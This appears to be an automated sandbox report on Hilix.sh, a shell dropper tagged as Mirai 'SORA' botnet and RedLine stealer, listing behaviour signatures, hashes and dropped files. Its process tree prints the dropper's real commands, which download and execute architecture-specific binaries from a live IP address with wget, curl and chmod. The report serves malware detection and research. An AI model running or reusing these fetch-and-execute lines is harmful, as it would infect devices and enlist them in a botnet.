Overview

overview

10

Static

static

1

Hilix.sh

ubuntu-18.04-amd64

10

Hilix.sh

debian-9-armhf

10

Hilix.sh

debian-9-mips

10

Hilix.sh

debian-9-mipsel

10

Resubmissions

02-01-2025 21:15

250102-z3zhbaypfj 4

02-01-2025 08:18

250102-j7arravrbp 10

Analysis

  • max time kernel
    150s
  • max time network
    156s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240611-en
  • resource tags

    arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
  • submitted
    02-01-2025 08:18

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Hilix.sh

  • Size

    1KB

  • MD5

    0c55987ace1771c5cb8533da3b2ba271

  • SHA1

    dedbf64de308bb11070bbe67f8c046b4602b7903

  • SHA256

    07744254fcb79b4e78cb7c1512db30dc3bb825c1ea6ab11725917fc6bb035782

  • SHA512

    68d6db0fbcf4dd9c4486703adcad76439082ddb22c0e4450fdb60c2355ce70017673dd8bbaa2db269e273356a75ecff1348e9ea6762a4acc903408bddc025b09

Score
10/10
mirairedlinesorabotnetdefense_evasiondiscoveryinfostealer

Malware Config

Extracted

Family

mirai

Botnet

SORA

Extracted

Family

mirai

Botnet

SORA

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

    botnetmirai
  • Mirai family
    mirai
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • Redline family
    redline
  • Contacts a large (197505) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • File and Directory Permissions Modification 1 TTPs 4 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

    defense_evasion
  • Executes dropped EXE 4 IoCs
  • Modifies Watchdog functionality 1 TTPs 6 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

    defense_evasion
  • Enumerates active TCP sockets 1 TTPs 3 IoCs

    Gets active TCP sockets from /proc virtual filesystem.

    discovery
  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Changes its process name 3 IoCs
  • Reads system network configuration 1 TTPs 3 IoCs

    Uses contents of /proc filesystem to enumerate network settings.

    discovery
  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

    discovery
  • System Network Configuration Discovery 1 TTPs 3 IoCs

    Adversaries may gather information about the network configuration of a system.

    discovery
  • Writes file to tmp directory 9 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/Hilix.sh
    /tmp/Hilix.sh
    1⤵
    • Writes file to tmp directory
    PID:698
    • /usr/bin/wget
      wget http://51.79.141.121/bins/Hilix.x86
      2⤵
      • Writes file to tmp directory
      PID:704
    • /usr/bin/curl
      curl -O http://51.79.141.121/bins/Hilix.x86
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:721
    • /bin/cat
      cat Hilix.x86
      2⤵
        PID:727
      • /bin/chmod
        chmod +x Hilix.sh Hilix.x86 SSH systemd-private-1efad5a3dfef4e41ba998db6220ca005-systemd-timedated.service-rg6s1p
        2⤵
        • File and Directory Permissions Modification
        PID:728
      • /tmp/SSH
        ./SSH Hilix-SSH
        2⤵
        • Executes dropped EXE
        PID:729
      • /usr/bin/wget
        wget http://51.79.141.121/bins/Hilix.mips
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:731
      • /usr/bin/curl
        curl -O http://51.79.141.121/bins/Hilix.mips
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:732
      • /bin/cat
        cat Hilix.mips
        2⤵
        • System Network Configuration Discovery
        PID:733
      • /bin/chmod
        chmod +x Hilix.mips Hilix.sh Hilix.x86 SSH systemd-private-1efad5a3dfef4e41ba998db6220ca005-systemd-timedated.service-rg6s1p
        2⤵
        • File and Directory Permissions Modification
        PID:734
      • /tmp/SSH
        ./SSH Hilix-SSH
        2⤵
        • Executes dropped EXE
        • Modifies Watchdog functionality
        • Enumerates active TCP sockets
        • Changes its process name
        • Reads system network configuration
        • Reads runtime system information
        PID:735
      • /usr/bin/wget
        wget http://51.79.141.121/bins/Hilix.mpsl
        2⤵
        • Writes file to tmp directory
        PID:744
      • /usr/bin/curl
        curl -O http://51.79.141.121/bins/Hilix.mpsl
        2⤵
        • Reads runtime system information
        • Writes file to tmp directory
        PID:745
      • /bin/chmod
        chmod +x Hilix.mips Hilix.mpsl Hilix.sh Hilix.x86 SSH
        2⤵
        • File and Directory Permissions Modification
        PID:763
      • /tmp/SSH
        ./SSH Hilix-SSH
        2⤵
        • Executes dropped EXE
        • Modifies Watchdog functionality
        • Enumerates active TCP sockets
        • Changes its process name
        • Reads system network configuration
        • Reads runtime system information
        PID:764
      • /usr/bin/wget
        wget http://51.79.141.121/bins/Hilix.arm4
        2⤵
          PID:773
        • /usr/bin/curl
          curl -O http://51.79.141.121/bins/Hilix.arm4
          2⤵
          • Reads runtime system information
          • Writes file to tmp directory
          PID:796
        • /bin/chmod
          chmod +x Hilix.arm4 Hilix.mips Hilix.mpsl Hilix.sh Hilix.x86 SSH
          2⤵
          • File and Directory Permissions Modification
          PID:810
        • /tmp/SSH
          ./SSH Hilix-SSH
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Changes its process name
          • Reads system network configuration
          • Reads runtime system information
          PID:812
        • /usr/bin/wget
          wget http://51.79.141.121/bins/Hilix.arm5
          2⤵
          • Writes file to tmp directory
          PID:816
        • /usr/bin/curl
          curl -O http://51.79.141.121/bins/Hilix.arm5
          2⤵
            PID:837

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • /tmp/SSH
          Filesize

          52KB

          MD5

          2749d7293c6f90673309d9e75396c750

          SHA1

          ff10e43ea2f7e951fb8e3aa3dc62f012f74217ca

          SHA256

          f17cfd0b79debb63fc16522833b3fdd72ff5f6c2c7e2c932a8940e8115dd40f5

          SHA512

          7c400dce85c9ecbb8ad0c48982215e26b80d85cc8a267c1a4be8e2163d2cf9d8f302420f692081e856b3ac19a3acfb5a6674ed2a1a6b783789026b5e87a2519f

          Download Submit

        • /tmp/SSH
          Filesize

          75KB

          MD5

          dd307c473227b29f08eca8dd1807339f

          SHA1

          a61c1ca4701ccc2ad616d2c6f7f0426201088fb7

          SHA256

          76d92c57b9f5973608133c5f13e71e4756cfb47663d3b8bc7b2dd23ebac76284

          SHA512

          d75431f47d4d5e5ad05e95a0fbb8f4f5ccb8d1eacbcd4031191f546c0442202bcfb654bf8eaea8945f6cbcbf97e2545fb7c55de28bf180b6559031f871308a96

          Download Submit